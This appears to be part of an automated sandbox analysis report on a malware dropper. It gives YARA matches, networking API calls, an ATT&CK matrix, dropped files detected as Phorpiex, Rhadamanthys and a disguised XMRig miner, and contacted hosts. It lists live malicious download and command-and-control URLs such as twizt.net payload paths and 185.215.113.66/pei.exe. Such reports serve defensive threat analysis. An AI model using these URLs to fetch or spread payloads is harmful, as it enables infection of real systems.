Source: Yara match	File source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	4_2_00401470
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	4_2_00402020
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	4_2_0040D710
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,	4_2_004013B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	5_2_00401470
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	5_2_00402020
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	5_2_0040D710
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,	5_2_004013B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	7_2_00401470
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	7_2_00402020
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	7_2_0040D710
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,	7_2_004013B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	13 Native API	1 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	21 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	411 Process Injection	11 DLL Side-Loading	NTDS	136 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	1 Scheduled Task/Job	121 Masquerading	LSA Secrets	561 Security Software Discovery	SSH	Keylogging	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	411 Process Injection	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
f5TWdT5EAc.exe	61%	ReversingLabs	Win32.Ransomware.GandCrab
f5TWdT5EAc.exe	100%	Avira	W32/Infector.Gen
f5TWdT5EAc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\2688734187.exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	100%	Avira	HEUR/AGEN.1351777
C:\Users\user\AppData\Local\Temp\896429707.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2779421088.exe	100%	Avira	HEUR/AGEN.1351777
C:\Users\user\AppData\Local\Temp\78476062.exe	100%	Avira	WORM/Phorpiex.olrti
C:\Users\user\AppData\Local\Temp\1657630034.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\2688734187.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\896429707.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2779421088.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\78476062.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\34D7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	92%	ReversingLabs	Win32.Spyware.Rhadamanthys
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	96%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe	88%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\1171111125.exe	75%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\1657630034.exe	79%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\2688734187.exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Temp\2779421088.exe	92%	ReversingLabs	Win32.Spyware.Rhadamanthys
C:\Users\user\AppData\Local\Temp\34D7.exe	88%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\640832494.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\78476062.exe	91%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\896429707.exe	96%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Windows\sysnldcvmr.exe	96%	ReversingLabs	Win32.Worm.Phorpiex

Name	IP	Active	Malicious	Reputation
geoplugin.net	178.237.33.50	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
twizt.net	185.215.113.66	true	true	unknown
twizthash.net	185.215.113.66	true	false	high
www.geoplugin.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.geoplugin.net/json.gp?ip=	false
http://185.215.113.66/pei.exe	true

URLs from Memory and Binaries

Name	Source	Malicious
http://twizt.net/lk7.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/pei.exePPC:	f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk11.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/1	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/2	sysnldcvmr.exe, 00000005.00000002.3950944128.000000000233B000.00000004.00000010.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com/ppsecure/ResolveUser.srf	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/4T	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-	svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/5	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA	svchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exeBn9	1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/3	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/4	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk18.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exe&m	1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/4C:	sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk9.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exeLj_	1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xs	svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA	svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds	svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exeP0U	1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmp	false
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk16.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/tcoin.php?s=%s	640832494.exe	false
http://twizt.net/lk2.exehttp://twizt.net/lk3.exehttp://twizt.net/lk4.exehttp://twizt.net/lk5.exehttp	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1oC	sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phph	34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/	34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1	svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1~	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk2.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phpO	34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	false
http://185.215.113.66/3A	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phpZ	34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	false
https://account.live.com/msangcwam	svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1JJC:	sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/5	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/4	sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/2H	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/3	sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/2	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi	svchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmp	false
http://nsis.sf.net/NSIS_ErrorError	f5TWdT5EAc.exe, 00000000.00000000.1309216886.0000000000408000.00000002.00000001.01000000.00000003.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmp	false
http://twizt.net/lk4.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1r	sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phpJ	34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1	sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds	svchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk14.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phpG	34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	false
http://nsis.sf.net/NSIS_Error	f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/3C:	sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.84/nxmr.exeP	78476062.exe, 0000000B.00000002.1777292756.0000000000E30000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.php%temp%%s	f5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk6.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fx	svchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee	svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exe	1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmp	false
https://account.live.com/Wizard/Password/Change?id=806014	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk12.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/newtpp.exe	34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.php	34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/peinstall.phpmp	34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.84/nxmr.exe	78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777292756.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:	svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/1A	sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/	896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	true
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA	svchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.84/nxmr.exeP0	sysnldcvmr.exe, 00000005.00000003.1690649668.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp, 78476062.exe, 0000000B.00000000.1623646967.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp	false
